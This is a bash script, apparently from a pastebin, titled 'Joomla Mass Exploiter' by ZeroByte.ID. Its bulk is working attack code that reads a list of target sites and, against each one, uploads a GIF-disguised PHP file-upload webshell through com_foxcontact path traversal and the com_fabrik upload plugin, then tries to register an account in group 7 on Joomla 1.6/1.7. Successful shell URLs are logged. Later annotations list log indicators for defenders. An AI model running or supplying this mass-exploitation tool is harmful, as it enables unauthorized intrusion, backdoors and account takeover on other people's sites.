
jembot

a guest Dec 23rd, 2017 583 Never
  1. #!/bin/bash
  2. # http://blog.zerobyte.id/
  3.  
  4. ## EDIT HERE ##
  # Operator settings. shell_log is the local file to which the functions below
  # append the URL of every upload they believe succeeded; email is the address
  # comusers() submits in the registration form.
  5. shell_log="webshell.txt";
  6. email="novran@equnix.asia";
  7. ## EOF ##
  8.  
  # Payload kept in $shell: the text "GIF89a;" (so the body starts like a GIF
  # image), a page titled "ZeroByte.ID", and a PHP snippet that passes an
  # uploaded file to move_uploaded_file() with a destination directory taken
  # from the request parameter "path". The functions below treat the string
  # "ZeroByte.ID" in a response as proof that the file is being served.
  # Defender note: in a webroot, a *.php file that begins with "GIF89a;" and
  # contains move_uploaded_file() fed by $_REQUEST["path"] matches this payload;
  # the "ZeroByte.ID" title string is a second content indicator.
  9. shell='GIF89a;'$(echo -ne '\n\r\n')'<title>ZeroByte.ID</title>'$(echo -ne '\n\r\n')'<pre><b>ZeroByte.ID Uploader</b></pre>'$(echo -ne '\n\r\n')'<?php $files = @$_FILES["files"];if ($files["name"] != "") {$fullpath = $_REQUEST["path"] . $files["name"];if (move_uploaded_file($files["tmp_name"], $fullpath)){echo "<a href=\"$fullpath\">Done! click here.</a>";}}?><form method=POST enctype="multipart/form-data" action="">'$(echo -ne '\n\r\n')'<input type=text name=path><input type="file" name="files">'$(echo -ne '\n\r\n')'<br><input type=submit value="Upload">'$(echo -ne '\n\r\n')'</form>';
  10. function foxcontact(){
          # Sends the $shell payload to four com_foxcontact upload endpoints of
          # the site given as $1 and, after each attempt, checks whether
          # components/com_foxcontact/shell_<5 digits>.php is being served.
          # Arguments: $1 - base URL of the site.
          # Globals:   shell (read), shell_log (appended to). victim, rand,
          #            filename, mids, cids, webshell, mid and cid are assigned
          #            without `local`, so they are script-wide.
          # Returns:   1 when no form id is found and also after a confirmed
          #            upload; otherwise the status of the final echo.
          # Defender note (access-log indicators visible in this function):
          #   - requests whose query string carries qqfile=/../../shell_<5 digits>.php
          #   - method GET with a request body, Content-Type: image/jpeg and an
          #     X-File-Name: shell_<5 digits>.php header
          #   - a follow-up GET for /components/com_foxcontact/shell_<5 digits>.php
          # Mitigation is outside this listing: keep or remove the extension per
          # vendor guidance and deny PHP execution for files an upload handler
          # can create.
  11.     victim=$1;
  12.     rand=$(shuf -i 10000-99999 -n 1);
  13.     filename="shell_"$rand".php";
          # The site URL is requested twice with method POST; the responses are
          # scanned for <a name="mid_..."> and <a name="cid_..."> anchors and the
          # id part is kept. NOTE(review): presumably these are the module /
          # component form ids the upload handler expects - confirm.
  14.     mids=$(timeout 10 curl -X POST $victim -s | grep '<a name=\"mid_' | sed 's|<a name="mid_||g' | sed 's|"></a>||g');
  15.     cids=$(timeout 10 curl -X POST $victim -s | grep '<a name=\"cid_' | sed 's|<a name="cid_||g' | sed 's|"></a>||g');
          # URL at which the script expects the uploaded file to be reachable.
  16.     webshell=$victim"/components/com_foxcontact/"$filename;
          # A mid takes precedence over a cid; the unused one is sent as 0.
  17.     if [[ ! -z "$mids" ]];then
  18.         mid=$mids;
  19.         cid=0;
  20.     elif [[ ! -z "$cids" ]];then
  21.         mid=0;
  22.         cid=$cids;
  23.     else
  24.         echo '[BAD] Com_Foxcontact CID & MID are empty.';
  25.         return 1;
  26.     fi
  27.  
          # Attempt 1 of 4: components/com_foxcontact/lib/file-uploader.php.
          # The response is discarded; success is judged only by the check below.
  28.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/components/com_foxcontact/lib/file-uploader.php?cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
          # Confirmation: fetch the expected URL and look for the payload's
          # title string; on a match the URL is printed and appended to $shell_log.
  29.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  30.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  31.         echo $webshell >> $shell_log;
  32.         return 1;
  33.     else
              # No-op placeholder; control falls through to the next attempt.
  34.         echo -ne '';
  35.     fi
  36.  
          # Attempt 2 of 4: index.php?option=com_foxcontact&view=loader with
          # owner=component.
  37.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id="${cid}"&cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
  38.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  39.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  40.         echo $webshell >> $shell_log
  41.         return 1;
  42.     else
  43.         echo -ne '';
  44.     fi
  45.  
          # Attempt 3 of 4: the same loader route with owner=module. The query
          # string is sent with literal "&amp;" sequences, which will appear
          # verbatim in access logs.
  46.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id="${cid}"&cid="${cid}"&mid="${mid}"&owner=module&id="${cid}"&qqfile=/../../"$filename;
  47.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  48.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  49.         echo $webshell >> $shell_log
  50.         return 1;
  51.     else
  52.         echo -ne '';
  53.     fi
  54.  
          # Attempt 4 of 4: components/com_foxcontact/lib/uploader.php.
  55.     timeout 10 curl -o /dev/null -s -H "X-File-Name: "${filename}"" -H "Content-Type: image/jpeg" --data "$shell" -X GET $victim"/components/com_foxcontact/lib/uploader.php?cid="${cid}"&mid="${mid}"&qqfile=/../../"$filename;
  56.     if [[ $(timeout 10 curl -s $webshell) =~ 'ZeroByte.ID' ]];then
  57.         echo '[OK] Com_Foxcontact Shell: '$webshell;
  58.         echo $webshell >> $shell_log
  59.         return 1;
  60.     else
  61.         echo -ne '';
  62.     fi
          # Reached only when none of the four confirmation fetches matched.
  63.     echo '[BAD] Com_Foxcontact Not Vulnerable.';
  64. }
  65.  
  66.  
  67. function fabrik(){
          # Posts the $shell payload as a multipart upload to the com_fabrik
          # "fileupload" plugin (method=ajax_upload) of the site given as $1 and
          # treats a response that contains the uploaded file name as success.
          # Arguments: $1 - base URL of the site.
          # Globals:   shell, domain (read), shell_log (appended to); victim,
          #            filename and exploit are assigned without `local`.
          # Files:     creates namerand.tmp and cache_<4 digits>.php in the
          #            current working directory and removes both at the end.
          # Defender note (indicators visible in this function): a multipart
          # POST to index.php with option=com_fabrik, task=plugin.pluginAjax,
          # plugin=fileupload and method=ajax_upload, whose form field "file"
          # carries a file named cache_<4 digits>.php. The listing does not show
          # where the server stores the file. Hardening is outside this listing:
          # keep or remove the extension per vendor guidance and deny PHP
          # execution in directories an upload handler writes to.
  68.     victim=$1;
          # The random number goes through a temp file instead of a variable.
  69.     shuf -i 1000-9999 -n 1 > namerand.tmp
  70.     filename='cache_'$(cat namerand.tmp)'.php';
          # Local copy of the payload that curl sends with -F "file=@...".
  71.     echo $shell > $filename;
  72.     exploit=$(timeout 10 curl -s -F "file=@"$filename $victim"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload");
  73.  
              # Success test: the response body mentions the uploaded file name.
              # The value printed and logged is $domain/$filename.
  74.         if [[ $exploit =~ $filename ]]; then
  75.             echo '[OK] Shell: '$domain'/'$filename;
  76.             echo $domain'/'$filename >> $shell_log;
  77.         else
  78.             echo '[BAD] Com_Fabrik Not Vulnerable.';
  79.         fi
  80.  
          # Remove the local payload copy and the random-number temp file.
  81.     rm -f $filename;
  82.     rm -f namerand.tmp;
  83. }
  84.  
  85.  
  86. function comusers(){
          # Registers an account through the com_users registration form of the
          # site given as $1, after checking that the site identifies itself as
          # Joomla! 1.6 or 1.7. Two submissions are sent in one cookie session:
          # the first has mismatched passwords and an extra jform[groups][]=7
          # field, the second has matching passwords and no groups field.
          # Arguments: $1 - base URL of the site.
          # Globals:   email (read); victim, token, username and password are
          #            assigned without `local`.
          # Files:     writes cookie_com_users.tmp, token_com_users.txt, 1.txt
          #            and 2.txt in the current working directory. The rm -f
          #            lines at the end run only on the "failed exploitation"
          #            path, and token_com_users.txt is never removed, so these
          #            files are forensic artefacts on a host that ran the script.
          # Returns:   1 on the early failure paths and also on reported success.
          # Defender note (indicators visible in this function): POSTs to
          # index.php?option=com_users&view=registration that carry a
          # jform[groups][] field, and accounts with username "zerobyte7" or
          # display name "Zerobyte.ID Exploiter". NOTE(review): group id 7 is
          # presumably a privileged group - verify against the site's user-group
          # table. Joomla! 1.6 and 1.7 are the only versions this function
          # proceeds against; sites still on them should be upgraded, and user
          # registration disabled where it is not needed.
  87.     victim=$1;
          # Version gate: look for the 1.7 or 1.6 title string on /administrator/
          # or /index.php; anything else is reported as not vulnerable.
  88.     if [[ $(timeout 5 curl -s $victim'/administrator/') =~ 'Joomla! 1.7 - Open Source Content Management' ]] || [[ $(timeout 5 curl -s $victim'/index.php') =~ 'Joomla! 1.7 - Open Source Content Management' ]]; then
  89.         echo -ne '';
  90.     elif [[ $(timeout 5 curl -s $victim'/administrator/') =~ 'Joomla! 1.6 - Open Source Content Management' ]] || [[ $(timeout 5 curl -s $victim'/index.php') =~ 'Joomla! 1.6 - Open Source Content Management' ]]; then
  91.         echo -ne '';
  92.     else
  93.         echo '[BAD] Com_Users Not Vulnerable.'
  94.         return 1;
  95.     fi
  96.  
          # Fetch the registration form, keep the session cookies, and extract
          # the name of the hidden field with value "1" that follows the
          # task=registration.register input (the form token field).
  97.     # GET HIDDEN VALUE
  98.     curl -s --cookie-jar cookie_com_users.tmp $victim"/index.php?option=com_users&view=registration" | grep -A 2 '<input type="hidden" name="task" value="registration.register"' | grep '" value="1"' | sed 's|" value="1"|\n|g' | head -1 | sed 's|<input type="hidden" name="|\ntoked: |g' | grep 'toked:' | awk '{print $2}' > token_com_users.txt;
  99.     token=$(cat token_com_users.txt);
  100.     if [[ -z $token ]];then
  101.         echo '[BAD] Com_Users cannot get token.'
  102.         return 1
  103.     else
  104.         echo -ne '';
  105.     fi
           # Fixed credentials used for the account the script tries to create.
  106.     username="zerobyte7";
  107.     password="123456";
           # First submission: password1 and password2 differ and the groups
           # field is included. The response is saved to 1.txt.
  108.     curl -s -L -b cookie_com_users.tmp -d "jform[name]=Zerobyte.ID Exploiter" -d "jform[username]="$username -d "jform[password1]=12345678" -d "jform[password2]=kkk0ntol" -d "jform[email1]="$email -d "jform[email2]="$email -d "jform[groups][]=7" -d "option=com_users" -d "task=registration.register" -d $(cat token_com_users.txt)"=1" $victim"/index.php?option=com_users&view=registration" > 1.txt;
           # The script continues only if the response contains the submitted
           # e-mail address.
  109.     if [[ $(cat 1.txt) =~ $email ]];then
  110.         echo -ne '';
  111.     else
  112.         echo '[BAD] Com_Users cannot find web-form.';
  113.         return 1
  114.     fi
           # Second submission, same cookie session: matching passwords and no
           # groups field. The response is saved to 2.txt.
  115.     curl -s -L -b cookie_com_users.tmp -d "jform[name]=Zerobyte.ID Exploiter" -d "jform[username]="$username -d "jform[password1]="$password -d "jform[password2]="$password -d "jform[email1]="$email -d "jform[email2]="$email -d "option=com_users" -d "task=registration.register" -d $(cat token_com_users.txt)"=1" $victim"/index.php?option=com_users&view=registration" > 2.txt;
           # If the response still contains the password field name, the script
           # reports failure; otherwise it reports success and returns before
           # the cleanup below.
  116.     if [[ $(cat 2.txt) =~ 'jform[password1]' ]];then
  117.         echo '[BAD] Com_Users failed exploitation.'
  118.     else
  119.         echo '[OK] Com_Users Exploited with ['$username':'$password'], open your email for verification.';
  120.         return 1
  121.     fi
  122.     rm -f cookie_com_users.tmp
  123.     rm -f 1.txt
  124.     rm -f 2.txt
  125. }
  126.  
  # Banner printed once at start-up; the quoted delimiter keeps it literal.
  127. cat << "CRE"
  128.  _____              _           _         _     _
  129. |__  /___ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  130.   / // _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  131.  / /|  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
  132. /____\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
  133.                           |___/                  
  134. ----------- schopath [at] zerobyte.id -----------
  135. ----------- Joomla Mass Exploiter V.1 -----------
  136. -------------------------------------------------
  137.  
  138. CRE
  139.  
  # Driver: $1 names a file of whitespace-separated site URLs. Each entry is
  # passed to foxcontact, fabrik and comusers in that order; the functions'
  # return values are not checked, so all three always run for every entry.
  # Defender note: one client touching com_foxcontact, com_fabrik and com_users
  # endpoints of a site in quick succession matches this loop. None of the curl
  # calls in the listing sets a User-Agent, so requests carry curl's default one.
  140. list=$1;
  141. for target in $(cat $list); do
  142.     echo '[+] Try: '$target;
  143.     foxcontact $target
  144.     fabrik $target
  145.     comusers $target
  146.     echo '';
  147. done